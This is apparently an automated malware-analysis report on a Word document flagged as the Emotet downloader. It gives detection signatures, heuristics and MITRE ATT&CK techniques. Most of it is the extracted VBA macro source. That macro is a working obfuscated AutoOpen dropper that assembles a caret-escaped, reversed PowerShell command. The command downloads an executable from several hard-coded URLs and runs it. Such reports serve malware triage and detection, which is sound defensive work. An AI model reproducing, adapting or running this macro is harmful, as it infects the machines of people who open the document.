MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample was identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6883987-0. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common execution vector for Emotet. The macro contains a Shell() call, indicating it is designed to execute a command-line payload, likely a downloader for further stages.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6883987-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6883987-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: In document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4525 bytes |
SHA-256: fa33e8644f969be64a970850433575910e011f7449a6fbb1dced897d4bd855aa
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "wOSbidJEwoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If GNftC >= vtKflX Then
qXjFwG = "XUK"
End If
If rpMqWN Or 17 Then
DhCFsL = "bLEwHEWk"
End If
If zObiC >= iISXFc Then
GwJmpu = "XlXERW"
End If
If jJHjO <> sHmJo Then
RzpDK = "iRVdwcp"
End If
If UQwYXp <= UdtDGT Then
vPNpih = "lw"
End If
If ibwTS Xor 4 Then
wdmaop = "c"
End If
If ZrYPu < mbAij Then
LzdISH = "Nwpt"
End If
If PiEaBw Or bwkzL Then
UjUJV = "OzAKKFdhWHZK"
End If
If QBtSv >= jrABpq Then
RswuQ = "AjU"
End If
sQYYMujFlRoYkP (KeyString(wUPjdlDs + KiDoR + 7 + 16 + 44 + CoRnuW + SVDiZHJz) + tQTDQC + QRdBKp + KeyString(iswEE + kLQAKYD + 8 + 19 + 50 + FQYoBzX + fGMVQKNj) + sRjwvDrpW + zOzND + WdsLzPTzPtB + sCsNAjQW + jmORqTj)
If NjdPjv Or 14 Then
CIBHj = "zLASwBdDr"
End If
If XjUdz <> aWwIP Then
onujfp = "RUWPKm"
End If
If SPPjns >= aSCdfw Then
dScCvI = "UtpJ"
End If
If aqPXtU > 19 Then
RoUZa = "SVbjcvUGzaf"
End If
End Sub
Attribute VB_Name = "rINhVsJrzbp"
Function sRjwvDrpW()
If sFNJWU <= 17 Then
vzbjvH = "DwkWcwCL"
End If
If irMDG <> 8 Then
ziwAMS = "irhNjMllkU"
End If
PscqfluA = "d /V^:/C" + """" + "^s^e^t " + "^4^IN^x=^ ^ ^ ^" + " ^ ^ ^ ^ ^ ^ ^ ^ "
If pJnAN >= jnhwzF Then
MiLOhL = "tfJN"
End If
If sHvjk <> XjNOtk Then
ajmWl = "H"
End If
NATFtkVQEP = "^ ^ ^ ^ ^}" + "^}{^hc^t^ac^" + "}^;^ka^er^b;" + "^S^L^t^$^ m" + "^e^t^I^-^e^k^ovn^"
If HHqsp And 17 Then
tsPiAf = "Tw"
End If
If MfZFGQ And Slwjjj Then
ahzlP = "THLWVwXMJzamR"
End If
BVidMjAFz = "I^;)^S^L^t^$^" + " ^,^X^m^i^$(e^l" + "^iF^d^a^o^lnw"
sRjwvDrpW = PscqfluA + NATFtkVQEP + BVidMjAFz
If QSPmEG And wRkGtj Then
uhAYFj = "vDpZKOt"
End If
If AcEUCk Xor saJmW Then
PkjSZG = "aEZPvsVQJsKm"
End If
If wzYJzS Xor jVAJi Then
pICLkV = "sljOPUPa"
End If
End Function
Function zOzND()
Hwivjl = "^o^D^.^i^M^A^" + "$^{^yr^t^{)^t^s^M^$^" + " n^i^ ^Xm^i^$(^hc^" + "a^er^o^f^;^'^e^x^e^." + "^'^+H^hv^$+^'^" + "\^'^+c^il^b^u"
nTNGjtpJH = "^p^:vn^e^$" + "^=^S^L^t^$;^'^21^'" + "^ ^=^ ^H^hv^" + "$^;)^'^@^'(^ti^l^p^S" + "^.^'^a^b^mNv/^m^o" + "c^.na^br^o^a^ile"
KhPzTrtWRmJ = "nro^k//^:^p^t^t^h" + "^@^T^2/^o^fn" + "^i^.r^o^t^a^mr" + "^a//:p^t^t^h^@^s^i"
mSaur = "^l^z/^t^en" + "^.^t^o^ic^h//^:^" + "p^t^t^h@^9^Tr^Dc^D^" + "k/^m^oc^.^enn^a^sr^u" + "//:^p^t^t^"
SipsfGY = "h^@^T^K^K^Y/^m^" + "oc^.^av^odr^oc" + "r^o^tc^e^h//^:^p^t^t" + "^h^'=^t^s^M$^"
zOzND = Hwivjl + nTNGjtpJH + KhPzTrtWRmJ + mSaur + SipsfGY
If SKuiD < SbITQE Then
Chozt = "Y"
End If
If pNjlGU = lcRUD Then
atINj = "zdXG"
End If
If czGdD Or dpKdd Then
RfrWYR = "v"
End If
If oWMBuq = 8 Then
OSGtYn = "cHY"
End If
End Function
Function WdsLzPTzPtB()
If wDETt > PTzlJM Then
aNofIL = "bvJ"
End If
If BJKiOW <> sUjWF Then
hsIqQA = "koKctwoEpW"
End If
iIhGWj = ";tn^e^i^lC^b^e^W^" + ".t^eN^ ^tc^e^j" + "^b^o^-^w^e" + "n^=^i^M^A^$"
If trUMv Xor 18 Then
lsiLJw = "mKFt"
End If
If lShHCz >= zIbdZ Then
KBhlw = "wiTiAZjLB"
End If
AqPkIbMn = "^ l^l^e^h^" + "sr^e^w^o^p&&" + "^f^or /^L %^H " + "^in (^3^41^;-^1^"
If olBwp = nJXCq Then
JUMdME = "M"
End If
If KKiAzR Eqv hhWmCA Then
hmEDP = "vs"
End If
If Evjoqr <> RzYzD Then
ovIwN = "Mwdvdwu"
End If
If wKEYB >= lYwRuN Then
OQnrO = "ciwQwdkqlr"
End If
fqnEXwc = ";^0)^d^o ^s^e" + "^t ^u^W=!^u" + "^W!!^4^IN^x:~%^H" + ",1!&&^i^f " + "%^H=^=^0 c^a^l^l " + "%^u^W:^~^4%" + """" + " "
iERUKkz = ""
WdsLzPTzPtB = iIhGWj + AqPkIbMn + fqnEXwc + iERUKkz
If maADqw <= VAzXSw Then
wcdYni = "zrqwDCvNpHb"
End If
If zAjHj <= SfZZva Then
lEfurK = "bsY"
End If
End Function
Attribute VB_Name = "nalkYiQ"
Function sQYYMujFlRoYkP(dUzurzYwjF As String)
Const tMICaPa = 233016815 - 233016815
If WSHwjV > QrqJp Then
LjunHc = "fiGq"
... (truncated)